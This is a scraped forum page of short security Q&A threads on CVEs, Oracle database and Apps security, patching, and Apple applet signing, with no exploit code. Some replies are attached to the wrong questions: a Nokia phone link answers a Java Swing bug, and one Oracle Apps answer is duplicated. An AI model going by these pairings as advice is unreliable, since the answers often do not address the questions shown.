Security vulnerability in Oracle 8.1.5

Similar Messages

• RV016 - TLS Protocol Session Renegotiation Security Vulnerability

  My RV016 with firmware 3.0.2.01-tm has failed PCI compliancy testing with my credit card company. They have identified that a TLS Protocol Session Renegotiation Security Vulnerability exists. I see that I have the most recent firmware version for my router and have disabled PPTP server, but I cannot get it to pass. How do I disable this feature?
  Steve

  I found the vulnerability number CVE-2009-3555
  If u have applied the latest Critical Patch Update, you should b fine.
  Find more details here
  http://www.oracle.com/technology/deploy/security/critical-patch-updates/javacpumar2010.html
  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3555

• Iphone 3G Software Update Fixes security vulnerability associated with viewing malicious PDF files?

  Is there an Iphone 3G Software Update Fixes security vulnerability associated with viewing malicious PDF files?  Latest version I can download is 4.2.1
  I assume no fix is available, does anyone know if I'm still vulnerable to the security bug?

  No fix is needed since that vulnarability isn't in 4.2.1.

• We use an add-on in one of our online solutions and we've identified a security vulnerability. The issue has been addressed in our latest add-ons and we would like to know how we may blocklist our previous player through a firefox update?

  We use an add-on in one of our online solutions and we've identified a security vulnerability. The issue has been addressed in our latest add-ons and we would like to know how we may blocklist our previous player through a firefox update?

  You can file a bug report to do that request.
  http://developer.mozilla.org/en/docs/Bug_writing_guidelines

• JComboBox makes for nice security vulnerability under X11?

  I noticed a couple years ago that when I set a breakpoint inside a JComboBox state change event handler on a Java application or applet running under X11, the entire desktop would hang. Back then, I checked the Swing bug database and found an issue regarding this, but it was closed with an evaluation that pretty much simply said that the developer didn't know how to fix it.
  When I brought this up in the netbeans mailing list, someone suggested that this could be a security issue if someone intentionally/programmatically stopped all processing from within this event handler (perhaps from an applet). Perhaps, as a security vulnerability this bug would get more attention!
  Well, it's been over a year and the latest JDK 1.6b10 (build 25) still has this problem. So, obviously it's not bothering anyone, except me, enough to do anything about it. I could try to file this bug under Swing again (probably with same outcome) or try filing it as a security bug. What are people's thoughts?

  Hi
  Try going here:
  http://europe.nokia.com/A4423034
  Or alternatively : find the product pages for the 5700 by going to www.nokia.com/phones, then pick out 5700, then dip into "PC software" and "Music"
  Cheers

• Security when using oracle text

  Hello,
  We would like to use Oracle text functionality on Oracle 10 but the System Admin told us that Oracle is accessing the filesystem with the user account who launched the oracle instance.
  He told us that this is a security problem : giving oracle password gives access to the file system.
  Is that true and is there a solution to make oracle connect to the filesystem with another linux user account ?
  Thanks a lot !

  raford wrote:
  This only applies when you use the FILE_DATASTORE to index documents on disk, rather than in the file system.
  You can restrict access to this feature by only allowing users having a specific role to use it - see
  http://download.oracle.com/docs/cd/B28359_01/text.111/b28304/cdatadic.htm#BHCBIFEA
  (NB. this is in the 11g documentation - I can't find it in the 10g manual but the functionality is the same).
  It's the database process itself which accesses the files, so it will always access them as the owner of the database process, there's no way to change that.What do you mean when you said " FILE_DATASTORE to index documents on disk, rather than in the file system" ?

• Multi security groups in Oracle apps hrms

  Hi All,
  Could you please let us know how to enable or disable multi security groups in Oracle Apps hrms?
  Thnaks,
  Anil

  If you have access to Oracle Help-on-line check it there
  <BLOCKQUOTE><font size="1" face="Verdana, Arial">quote:</font><HR>Originally posted by Amit Das ([email protected]):
  Can you please tell me of any document/book etc which describes the security features in Oracle Apps specially on Oracle financials. <HR></BLOCKQUOTE>
  null

• Security features in Oracle Apps (Oracle Financuals)

  Can you please tell me of any document/book etc which describes the security features in Oracle Apps specially on Oracle financials.

  If you have access to Oracle Help-on-line check it there
  <BLOCKQUOTE><font size="1" face="Verdana, Arial">quote:</font><HR>Originally posted by Amit Das ([email protected]):
  Can you please tell me of any document/book etc which describes the security features in Oracle Apps specially on Oracle financials. <HR></BLOCKQUOTE>
  null

• Security Measures of Oracle e-business Suite

  Hi ,
  Can anyone please provide any link/material on Security Measures of Oracle e-business Suite.
  I need this stuff pretty urgently.
  Thanks in advance,
  Sandy...

  Best Practices for Securing Oracle E-Business Suite (Metalink Note 189367.1)

• Security Evaluation of Oracle Application Server

  Are there any published documents on security evaluation of Oracle Application Server?
  Is it secure as a tool against some attacks, for example, are following vulnerabilities when applicable to the server dealt with or should be handled by application? :
  failure to restrict url access,
  broken authentication and session management
  insecure cryptographic storage,
  injection flaws
  failure to restrict directory browsing
  Are there available document that we can refer to on these issues?
  Regards
  Farbod

  Thank you again.
  Can you advise on this part of my message also?
  "Also I see in oracle recommended architectures that there is a firewall between each http server and application server. Does the built in OHS in OAS provide the firewall? or I need to install another firewall?"
  I am going to explain it but I think it is completely inconsistent with the thread title which I got some of my answers in, so let me start a new thread here:
  Application Server Recommended Deployment Architectures, How to?
  Thanks for your useful inputs.
  Best Regards,
  Farbod

• Security issues on Oracle Database (10g)

  Hello,
  I need to make a security manual for Oracle (10g) databases. This has to be some sort of checklist to assure a database is secure. I am thinking of encryption, least privilege, limit access, etc etc. I am sure this has been done before. Please help me with links to documents about this.
  Kind regards,
  Rob Schenk

  (Funny thing - Oracle has hired people to write documentation and has placed it online for anyone to read.)
  You just might find what you need in the "Security Guide" at http://www.oracle.com/pls/db102/portal.portal_db?selected=1
  If documentation is not sufficient, I recommend http://www.amazon.com/gp/product/0974372749/

• Security Rules in Oracle Financials GL

  I have defined security rules in Oracle Financials GL version 11.0.3. The security rules can be applied in form level.
  e.g For account inquiry, only limited accounts can be viewed.
  But for all reports in Oracle Financials, it's not restricted by the rules. How can I applied those rules in reports as well?

  Unfortunately data in standard and bespoke oracle reports is not restricted by security rules by default.
  Security can be enabled for FSG reports.
  If you need security rules to be applied to standard reports, I am afraid, you need customization.

• Applying security patch to Oracle 10G on Linux

  Hello,
  I'm new to Oracle DBA world, need to apply security patch to Oracle 10G on Linux server, any tips and notes would be appreciated.
  thanks
  Sam

  Manish,
  1. I have to upgrade the database version from 10.2.0.2 to 10.2.0.4 on Linux, Is there any proper documentation which will help me out?Please refer to the following document.
  Note: 454750.1 - Oracle Apps Release 12 with Oracle Database 10.2.0 interoperability notes
  https://metalink.oracle.com/metalink/plsql/ml2_documents.showDocument?p_database_id=NOT&p_id=454750.1
  2. What are the types of oracle database patches? what is the proper procedure to apply those kind of patches to Oracle 10g on Linux?
  Most of the patches in this upgrade are database patches (which should be applied using opatch). The main upgrade patch (Patch 6810189 - 10.2.0.4 patch set) should be applied using Oracle Universal Installer (runInstaller).
  Always follow the steps in the patch README file before applying any patch.
  Regards,
  Hussein

• CVE-2000-0649 Security Vulnerability

  I have 2 NW 6.5 SP8 servers which are running HTTPSTK (version 4.03 9/4/08) PORTAL (version 4.03 9/22/08). I am trying to pass a security scan and a security vulnerability on ports 8008 and ports 8009 has been identified, issue CVE-2000-0649, whereby my internal IP addresses may be exposed.
  Is there a later version of HTTPSTK and PORTAL which address this security vulnerability, or do I need to close ports 8008 and 8009 via my firewall?

  -----BEGIN PGP SIGNED MESSAGE-----
  Hash: SHA1
  Did you read the CVE... the one from eleven years ago? First clue that
  this is, as usual, bogus:
  <quote>
  IIS 4.0 allows remote attackers to obtain the internal IP address of the
  server via an HTTP 1.0 request for a web page which is protected by basic
  authentication and has no realm defined.
  </quote>
  If you're really concerned have your security assessors prove the issue is
  real by exploiting the vulnerability.
  Good luck.
  On 06/27/2011 10:36 AM, flakestar wrote:
  >
  > I have 2 NW 6.5 SP8 servers which are running HTTPSTK (version 4.03
  > 9/4/08) PORTAL (version 4.03 9/22/08). I am trying to pass a security
  > scan and a security vulnerability on ports 8008 and ports 8009 has been
  > identified, issue CVE-2000-0649, whereby my internal IP addresses may be
  > exposed.
  >
  > Is there a later version of HTTPSTK and PORTAL which address this
  > security vulnerability, or do I need to close ports 8008 and 8009 via my
  > firewall?
  >
  >
  -----BEGIN PGP SIGNATURE-----
  Version: GnuPG v2.0.15 (GNU/Linux)
  Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
  iQIcBAEBAgAGBQJOCLtRAAoJEF+XTK08PnB5gJ4QAI1k0a3y1t 6Pua2lK50gU0Xr
  l2AMohzLEDRgyia2z16magQNy7mhfIlBdvC5gI30WV4GmGI2Yv Ydco0W8uEUoenY
  qXPhZLCT7pfbs1pIpv+nlNfV69UlobcM5FiAuw4lu815WNBO37 77i53K1Gh6PN7A
  vIv9JImirxM1WQVYYsibpiO+dxUyjr3CJ6ND5TlGcojVhx7Uti tipmrAspHBw+vd
  QUlg9QUt7i2lk6JHt2M3YArcD0LI8UzFhwmsqxLZ+4a/BJzkY1Q13Thb/cLx1cM7
  d1KWlF4h81K+hTCBP78Q+fWQrcVgNq10ix0hhaKat0oRpKoXfV 9nJjyZgMJ6V/vi
  HHeptlfonOUAef5KxEZJoac7FCQRgTsgOhM1Sj+sXtAQ6gAH8Q I+0j5iw4iBBwRs
  +Ycc5SdoFAVe1aXjz7CfZjaOgk/I2S3OgCSceJEf5X5eBhzl4C0g9xDzhALo5MFp
  iDMhAPJ19bMVT374mhC1J9QsOvM/o07a9vth6zgy3g5aQrL/SO4Rmyy6w1LiKeBX
  hoM8pEZSvU4AFWh4okDRZdplEcKjEzowyTwwRcC8gIQHE4kxir Iso5v62vTSTxM4
  0JbqRfQvuGZQN8dh7W2HiF5Bi+d9Q3bJ0zhhG1GLGu/iIAsXGYMRvsQAx4tPIGcJ
  puQi/2ySMcsNfb0bOL9L
  =pz/w
  -----END PGP SIGNATURE-----

• HT202802 What "security vulnerability" will be opened by using this signing technique?

  Regarding article: HT202802
  OS X: Using AppleScript with Accessibility and Security features in Mavericks - Apple Support
  The article says:
  Important: Signing an applet using the following method introduces a security vulnerability that could allow malicious software to use Accessibility without user permission.
  1. What "security vulnerability" will be opened by using this signing technique?
  2. Does signing this way only make the App its applied to vulnerable only? and then the whole computer vulnerable depending on how extensive the app's reach is to the rest of the computer?
  3. More information: My app only relates to the Reminders app and bunch of Finder items....nothing internet based, etc.  That being said, is this still a vulnerability to my computer?
  "Note: If you have your own signing identity, you may use that identity in place of “-” for the -s option." 
  1. What is "my own signing identity?" and if I don't have one, would it add security to get one and use it here?
  Thanks for the help in advance!

  1) There are a few system features, including accessibility, that will override any and all other security protections on you machine. This is the vulnerability. In giving the script the ability to control your machine, you give control of your machine to the script.
  2) By signing the script, that control is permanent. If the app doesn't do anything malicious, there is no problem. But malicious apps sometimes don't manifest until later.
  3) Did you write the app? If so, then there is nothing to worry about. If not, then how much do you trust the author of the app?
  Generally, this isn't too big a deal. Apple is very protective, but most people generally hand over their passwords to anyone. They shouldn't, of course, but generally they do. They don't realize the extent to which they have handed over control of their machine and all of their data. Apple is trying to point that out.